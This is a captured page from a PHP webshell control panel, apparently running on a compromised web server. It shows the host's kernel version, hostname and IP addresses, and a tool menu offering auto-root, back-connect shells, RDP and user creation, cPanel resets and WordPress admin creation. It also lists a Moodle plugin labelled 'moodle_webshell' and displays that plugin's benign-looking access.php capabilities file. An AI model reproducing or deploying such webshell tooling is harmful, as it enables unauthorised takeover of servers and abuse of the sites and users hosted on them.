Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.35
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
local /
mvd /
db /
[ HOME SHELL ]
Name
Size
Permission
Action
access.php
1.51
KB
-rw-r--r--
events.php
353
B
-rw-r--r--
install.php
366
B
-rw-r--r--
install.xml.example
429
B
-rw-r--r--
messages.php
281
B
-rw-r--r--
renamedclasses.php
304
B
-rw-r--r--
services.php
1.63
KB
-rw-r--r--
uninstall.php
398
B
-rw-r--r--
upgrade.php
582
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : access.php
<?php /** * @package moodle_webshell * @copyright 2022, Remi GASCOU (Podalirius) <podalirius@protonmail.com> * @license MIT * @doc https://docs.moodle.org/dev/Access_API */ // If you change this file, you must upgrade the plugin version inorder for your // changes to take effect. defined('MOODLE_INTERNAL') || die(); $capabilities = array( 'local/cq_availability:secreteyes' => array( 'riskbitmask' => RISK_CONFIG, // https://docs.moodle.org/dev/Hardening_new_Roles_system 'captype' => 'write', // read or write 'contextlevel' => CONTEXT_SYSTEM , // https://docs.moodle.org/dev/Roles#Context 'archetypes' => array( // https://docs.moodle.org/dev/Role_archetypes (What are archetypes) // @key https://docs.moodle.org/dev/Roles#Capabilities_2 // Use only the last part of the capability, don't // include the context or component and all these stuff. // ex: // if you want to use 'moodle/legacy:student' from the list. // you can write it as follow: // // 'student' => CAP_ALLOW // // don't include the 'moodle/legacy:' part. // // @value https://docs.moodle.org/dev/Roles#Capabilities 'editingteacher' => CAP_ALLOW, ), //'clonepermissionsfrom' => 'moodle/quiz:attempt' // From May 2012: Copy defaults capabilities settings from core. ) );
Close